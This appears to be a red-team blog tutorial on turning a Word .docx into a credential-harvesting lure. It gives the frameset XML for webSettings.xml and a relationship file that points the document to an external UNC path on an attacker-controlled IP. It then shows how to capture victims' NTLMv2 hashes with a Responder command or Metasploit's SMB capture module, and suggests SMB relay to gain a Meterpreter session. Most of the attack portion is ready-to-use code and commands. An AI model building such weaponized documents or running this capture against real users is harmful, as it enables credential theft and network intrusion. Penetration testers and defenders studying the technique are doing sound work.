Microsoft office documents are playing a vital role towards red team assessments as usually they are used to gain some initial foothold on the client’s internal network. Staying under the radar is a key element as well and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft office.

Historically Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combing this with responder in order to capture NTLM hashes externally.

Word documents with the docx extension are actually a zip file which contains various XML documents. These XML files are controlling the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files:

Docx Contents

Docx Contents

The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the frameset.

webSettings File

webSettings File

Adding the following code will create a link with another file.

<w:frameset>
<w:framesetSplitbar>
<w:w w:val="60"/>
<w:color w:val="auto"/>
<w:noBorder/>
</w:framesetSplitbar>
<w:frameset>
<w:frame>
<w:name w:val="3"/>
<w:sourceFileName r:id="rId1"/>
<w:linkedToFile/>
</w:frame>
</w:frameset>
</w:frameset>
webSettings XML - Frameset

webSettings XML – Frameset

The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten.

webSettings with Frameset - Adding new version to archive

webSettings with Frameset – Adding new version to archive

A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1) the UNC path and the TargetMode if it is external or internal.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>
webSettings XML Relationship File - Contents

webSettings XML Relationship File – Contents

The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset.

webSettings XML rels

webSettings XML rels

Now that the Word document has been weaponized to connect to a UNC path over the Internet responder can be configured in order to capture the NTLM hashes.

responder -I wlan0 -e 192.168.1.169 -b -A -v
Frameset - Responder Configuration

Responder Configuration

Once the target user open the word document it will try to connect to a UNC path.

Word - Connect to UNC Path via Frameset

Word – Connect to UNC Path via Frameset

Responder will retrieve the NTLMv2 hash of the user.

Responder - NTLMv2 Hash via Frameset

Responder – NTLMv2 Hash via Frameset

Alternatively Metasploit Framework can be used instead of Responder in order to capture the password hash.

auxiliary/server/capture/smb
Metasploit - SMB Capture Module for Frameset

Metasploit – SMB Capture Module

NTLMv2 hashes will be captured in Metasploit upon opening the document.

Metasploit SMB Capture Module - NTLMv2 Hash via Frameset

Metasploit SMB Capture Module – NTLMv2 Hash via Frameset

Conclusion

This technique can allow the red team to grab domain password hashes from users which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally if the target user is an elevated account such as local administrator or domain admin then this method can be combined with SMB relay in order to obtain a Meterpreter session.

Advertisements